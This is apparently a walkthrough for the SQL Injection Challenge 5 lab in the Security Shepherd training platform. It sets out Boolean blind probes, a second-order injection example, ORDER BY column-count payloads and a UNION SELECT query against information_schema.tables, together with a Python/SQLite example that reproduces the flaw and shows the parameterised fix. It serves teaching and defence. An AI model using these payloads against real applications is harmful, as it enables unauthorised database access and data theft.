SQL Injection Challenge 5 (Security Shepherd)

    (The payloads below are illustrative; actual payloads must be adapted to the app's query structure and database engine.)

    In some versions of Security Shepherd, Challenge 5 is a Second-Order SQL Injection. You might inject a payload into a registration form (e.g., username: admin' -- ), which gets stored in the database. Later, when the admin views the "User List" page, your payload executes. This level requires thinking about the database as a persistence layer for attack strings.

    You need to find which table holds the key. Without error messages to guide you, guess common names such as keys, secrets or hash and test each one with a Boolean condition:

    5' AND (SELECT COUNT(*) FROM keys) > 0 AND '1'='1

    If "Valid" appears, the table keys exists.

    Similarly, find the column:

    5' AND (SELECT COUNT(secret) FROM keys) > 0 AND '1'='1

    If "Valid" appears, the column secret exists in table keys.

    (Note: In many versions of Challenge 5, the table is ch5 and column is hash or key.)
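The Boolean probes above only work because the application splices the input into the SQL text and then reports "Valid" or "Invalid" from the result. The following example, added here and not Security Shepherd's own code, reproduces that flaw in a small Python/SQLite stand-in and places the parameterised lookup beside it, where the very same probe strings are just a user id that matches nothing. The users and ch5 tables, the hash column and the function names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the challenge database. The table and column
# names are assumptions for this example; the walkthrough notes that the
# real key table is often called ch5 with a hash or key column.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (userId TEXT, name TEXT);
        INSERT INTO users VALUES ('5', 'alice');
        CREATE TABLE ch5 (hash TEXT);
        INSERT INTO ch5 VALUES ('constructed-example-key');
    """)
    return db

# The probes from the walkthrough: the first names a table that exists in
# this stand-in (ch5), the second one that does not (keys).
PROBE_EXISTING_TABLE = "5' AND (SELECT COUNT(*) FROM ch5) > 0 AND '1'='1"
PROBE_MISSING_TABLE = "5' AND (SELECT COUNT(*) FROM keys) > 0 AND '1'='1"

def lookup_vulnerable(db, user_id):
    """The flaw: user input is spliced into the SQL text, so the outcome
    ("Valid", "Invalid" or an error) leaks whether the injected condition
    could be evaluated at all and what it evaluated to."""
    sql = f"SELECT name FROM users WHERE userId = '{user_id}'"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return "Error"  # e.g. no such table: the third state the probe relies on
    return "Valid" if rows else "Invalid"

def lookup_parameterised(db, user_id):
    """The fix: bind the value as a parameter. The driver never parses it as
    SQL, so any probe string is simply a user id that matches no row.
    The same rule covers the second-order case: a value read back from the
    database must be bound, not concatenated, wherever it is reused in SQL."""
    rows = db.execute("SELECT name FROM users WHERE userId = ?", (user_id,)).fetchall()
    return "Valid" if rows else "Invalid"

if __name__ == "__main__":
    db = make_db()
    for probe in (PROBE_EXISTING_TABLE, PROBE_MISSING_TABLE):
        print("vulnerable:", lookup_vulnerable(db, probe),
              "| parameterised:", lookup_parameterised(db, probe))
```

With the vulnerable lookup the two probes produce two different responses, which is the oracle the walkthrough describes; with the bound parameter both collapse to "Invalid" and the oracle is gone.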

    To perform a UNION SELECT, your injected query must have the same number of columns as the original query. We need to find this number.

    Try injecting the following payloads to test for column count using the ORDER BY technique:

    Payload 1: ' ORDER BY 1-- (If no error, there is at least 1 column)

    Payload 2: ' ORDER BY 2-- (If no error, there are at least 2 columns)

    Payload 3: ' ORDER BY 3-- (If no error, there are at least 3 columns)

    Payload 4: ' ORDER BY 4--

    If the application returns an error (or a blank page) at ORDER BY 4, but worked for ORDER BY 3, then the original query has 3 columns.

    We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), the names of all tables are listed in information_schema.tables.

    Payload:

    ' UNION SELECT 1, table_name, 3 FROM information_schema.tables-- 

    Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.

    This injection will list table names. You look for a table named something like users or app_users.